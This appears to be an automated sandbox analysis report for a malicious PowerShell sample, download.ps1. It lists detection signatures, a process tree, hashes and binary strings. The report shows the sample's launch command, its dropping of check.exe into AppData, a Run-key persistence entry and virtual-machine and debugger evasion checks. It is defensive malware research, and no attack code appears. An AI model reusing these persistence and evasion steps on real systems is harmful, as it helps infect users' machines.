Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1571745
MD5:0188ae5e15c1edc64ab1ae6ca5b6e72f
SHA1:29f44de502cc3c08d6cef1c020ad9e7ef3f953bc
SHA256:8215c16d5462d70b3c146a74a6ac6bf38b434691bd27d5c46754ace5fd2b4964
Tags:KongTukeps1user-monitorsg
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Opens network shares
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 7552 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • check.exe (PID: 7992 cmdline: "C:\Users\user\AppData\Roaming\HseeHuht\check.exe" MD5: F17797CAAB0F1CB8D5813853AAD786CA)
      • check.exe (PID: 8060 cmdline: "C:\Users\user\AppData\Roaming\HseeHuht\check.exe" MD5: F17797CAAB0F1CB8D5813853AAD786CA)
        • systeminfo.exe (PID: 8136 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 6524 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 3800 cmdline: wmic computersystem get manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • WerFault.exe (PID: 7284 cmdline: C:\Windows\system32\WerFault.exe -u -p 8060 -s 892 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • check.exe (PID: 8076 cmdline: "C:\Users\user\AppData\Roaming\HseeHuht\check.exe" MD5: F17797CAAB0F1CB8D5813853AAD786CA)
    • check.exe (PID: 5112 cmdline: "C:\Users\user\AppData\Roaming\HseeHuht\check.exe" MD5: F17797CAAB0F1CB8D5813853AAD786CA)
      • systeminfo.exe (PID: 2848 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
        • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1848 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 1928 cmdline: wmic computersystem get manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WerFault.exe (PID: 4260 cmdline: C:\Windows\system32\WerFault.exe -u -p 5112 -s 956 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • check.exe (PID: 4460 cmdline: "C:\Users\user\AppData\Roaming\HseeHuht\check.exe" MD5: F17797CAAB0F1CB8D5813853AAD786CA)
    • check.exe (PID: 7608 cmdline: "C:\Users\user\AppData\Roaming\HseeHuht\check.exe" MD5: F17797CAAB0F1CB8D5813853AAD786CA)
      • systeminfo.exe (PID: 4376 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
        • conhost.exe (PID: 3968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5192 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 4212 cmdline: wmic computersystem get manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WerFault.exe (PID: 4656 cmdline: C:\Windows\system32\WerFault.exe -u -p 7608 -s 928 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 7552, ProcessName: powershell.exe
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\HseeHuht\check.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7552, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetUtilityApp
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7552, TargetFilename: C:\Users\user\AppData\Roaming\HseeHuht\check.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 7552, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 80.6% probability
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtiff.pdbBB source: check.exe, 00000004.00000003.1610880860.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\platformthemes\qxdgdesktopportal.pdb source: check.exe, 00000004.00000003.1613622997.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtsvg\plugins\imageformats\qsvg.pdb source: check.exe, 00000004.00000003.1610571166.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtsvg\plugins\iconengines\qsvgicon.pdb source: check.exe, 00000004.00000003.1605150229.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: check.exe, 00000005.00000002.2236169287.00007FFB02427000.00000002.00000001.01000000.00000020.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: check.exe, 00000005.00000002.2238792749.00007FFB0287A000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdb source: check.exe, 00000004.00000003.1574176850.000001A2C2634000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2254484299.00007FFB1E3A3000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\generic\qtuiotouchplugin.pdb source: check.exe, 00000004.00000003.1604956323.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: check.exe, 00000005.00000002.2247223611.00007FFB0B4E5000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdb source: check.exe, 00000005.00000002.2240383071.00007FFB02DB6000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: check.exe, 00000005.00000002.2248013982.00007FFB0B585000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qico.pdb source: check.exe, 00000004.00000003.1605718815.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtiff.pdb source: check.exe, 00000004.00000003.1610880860.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qgif.pdb source: check.exe, 00000004.00000003.1605332186.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtga.pdb source: check.exe, 00000004.00000003.1610704745.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: check.exe, 00000005.00000002.2238792749.00007FFB027E2000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: check.exe, 00000005.00000002.2254902034.00007FFB1E3C4000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: check.exe, 00000005.00000002.2254902034.00007FFB1E3C4000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: check.exe, 00000005.00000002.2238792749.00007FFB0287A000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: check.exe, 00000004.00000003.1591302099.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2253522169.00007FFB1D5B5000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qicns.pdb source: check.exe, 00000004.00000003.1605539019.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: check.exe, 00000005.00000002.2253080891.00007FFB1D343000.00000002.00000001.01000000.00000018.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\styles\qwindowsvistastyle.pdb%% source: check.exe, 00000005.00000002.2246454728.00007FFB0B447000.00000002.00000001.01000000.00000027.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\styles\qwindowsvistastyle.pdb source: check.exe, 00000005.00000002.2246454728.00007FFB0B447000.00000002.00000001.01000000.00000027.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: check.exe, 00000005.00000002.2254003288.00007FFB1DE53000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: check.exe, 00000005.00000002.2252607497.00007FFB1CA16000.00000002.00000001.01000000.0000001C.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qico.pdb source: check.exe, 00000004.00000003.1605718815.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: check.exe, 00000005.00000002.2255697240.00007FFB23A6B000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\generic\qtuiotouchplugin.pdb source: check.exe, 00000004.00000003.1604956323.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdbT source: check.exe, 00000005.00000002.2240383071.00007FFB02DB6000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: check.exe, 00000005.00000002.2251272869.00007FFB1C813000.00000002.00000001.01000000.0000001D.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: check.exe, 00000005.00000002.2255697240.00007FFB23A6B000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Widgets.pdb source: check.exe, 00000005.00000002.2232844342.00007FFB01C7A000.00000002.00000001.01000000.00000023.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: check.exe, 00000005.00000002.2250838396.00007FFB1C519000.00000002.00000001.01000000.00000017.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\platforms\qwindows.pdb source: check.exe, 00000005.00000002.2228519197.00007FFB00F94000.00000002.00000001.01000000.00000026.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qwbmp.pdb source: check.exe, 00000004.00000003.1611120913.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: check.exe, 00000005.00000002.2218188859.000001FA7C2F0000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\libEGL.pdb source: check.exe, 00000004.00000003.1593302035.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: check.exe, 00000005.00000002.2243716928.00007FFB03588000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdb source: check.exe, 00000005.00000002.2247223611.00007FFB0B4E5000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: check.exe, 00000004.00000003.1591113772.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: check.exe, 00000005.00000002.2250105454.00007FFB1C4EE000.00000002.00000001.01000000.00000019.sdmp
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B1283C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00007FF60B1283C0
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B129280 FindFirstFileExW,FindClose,4_2_00007FF60B129280
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B141874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF60B141874
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 5_2_00007FF60B129280 FindFirstFileExW,FindClose,5_2_00007FF60B129280
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: nodejs.org
Source: check.exe, 00000005.00000002.2221834167.000001FA7D300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
Source: check.exe, 00000004.00000003.1593302035.000001A2C2636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredID
Source: check.exe, 00000004.00000003.1613622997.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1605539019.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1611675678.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1589927228.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1582748043.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1586018913.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1613792871.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1604956323.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1593302035.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1610704745.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1611120913.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1589031823.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1605332186.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1612251642.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1587014529.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1587686286.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1593302035.000001A2C2643000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1579187739.000001A2C2635000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1575815572.000001A2C2635000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1605718815.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1593764409.000001A2C2636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: check.exe, 00000004.00000003.1613622997.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1605539019.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1611675678.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1589927228.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1582748043.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1586018913.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1613792871.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1604956323.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1593302035.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1610704745.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1611120913.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1589031823.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1605332186.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1612251642.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1587014529.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1587686286.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1593302035.000001A2C2643000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1579187739.000001A2C2635000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1575815572.000001A2C2635000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1605718815.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1593764409.000001A2C2636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: check.exe, 00000004.00000003.1613622997.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1605539019.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1611675678.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1589927228.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1582748043.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1586018913.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1613792871.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1604956323.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1593302035.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1610704745.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1611120913.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1589031823.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1605332186.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1612251642.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1587014529.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1587686286.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1579187739.000001A2C2635000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1575815572.000001A2C2635000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1605718815.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1593764409.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1610571166.000001A2C2636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: check.exe, 00000005.00000002.2219830861.000001FA7CD92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: check.exe, 00000005.00000002.2219830861.000001FA7CEFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: check.exe, 00000005.00000002.2217466014.000001FA7A8C9000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2219830861.000001FA7CD92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
